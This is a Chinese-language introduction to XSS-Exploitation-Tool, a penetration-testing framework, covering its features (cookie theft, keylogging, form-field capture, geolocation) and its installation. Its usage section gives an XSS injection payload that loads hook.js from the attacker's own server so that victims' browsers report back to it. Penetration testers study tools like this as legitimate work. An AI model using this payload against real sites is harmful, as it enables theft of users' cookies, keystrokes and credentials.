关于XSS-Exploitation-Tool

XSS-Exploitation-Tool是一款功能强大的XSS漏洞扫描与利用工具，该工具专为渗透测试人员设计，可以帮助广大安全研究人员以快速的方式识别并利用跨站脚本XSS漏洞。

需要注意的是，该工具仅出于教育目的设计和开发，请不要将其用于真实环境。

功能介绍

1、支持获取关于目标浏览器的技术数据；

2、支持获取目标用户的地理坐标位置；

3、支持获取已挂起/已访问的网页快照；

4、支持获取已挂起/已访问的网页源代码；

5、支持提取表单输入字段数据；

6、支持获取Cookie数据；

7、键盘记录功能；

8、显示警告弹窗；

9、重定向用户；

工具安装

当前版本的XSS-Exploitation-Tool已在Debian 11上进行过测试。

在使用该工具之前，你还需要安装Apache、MySQL数据库和PHP相关模块：

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom

$ sudo rm /var/www/index.html

接下来，广大研究人员可以直接使用下列命令将该项目源码克隆至本地：

$ sudo apt-get install git

 

$ cd /tmp

$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git

$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

然后安装composer，并安装该工具所需的其他依赖组件：

$ sudo apt-get install composer

$ cd /var/www/html/

$ sudo chown -R $your_debian_user:$your_debian_user /var/www/

$ composer install

$ sudo chown -R www-data:$www-data /var/www/

安装完成后，使用下列命令初始化数据库：

$ sudo mysql

然后使用指定的权限创建一个新的用户：

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';

Query OK, 0 rows affected (0.00 sec)

 

MariaDB [(none)]> flush privileges;

Query OK, 0 rows affected (0.00 sec)

 

MariaDB [(none)]> quit

Bye

创建好数据库之后，访问下列地址即可：

http://server-ip/reset_database.php

调整JavaScript钩子文件

hook.js是一个钩子，我们需要使用服务器端的IP地址替换文件中的第一行数据：

var address = "your server ip";

工具使用

首先，我们需要创建一个页面来插入JavaScript钩子文件：

?vulnerable_param=<script src="http://your_server_ip/hook.js"/>

然后，当目标用户访问这个设置了钩子文件的页面之后，工具的服务器端则会列出目标浏览器列表。

工具运行截图

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址

XSS-Exploitation-Tool：【GitHub传送门】

参考资料

https://sharpforce.gitbook.io/cybersecurity/mes-projets/xss-exploitation-tool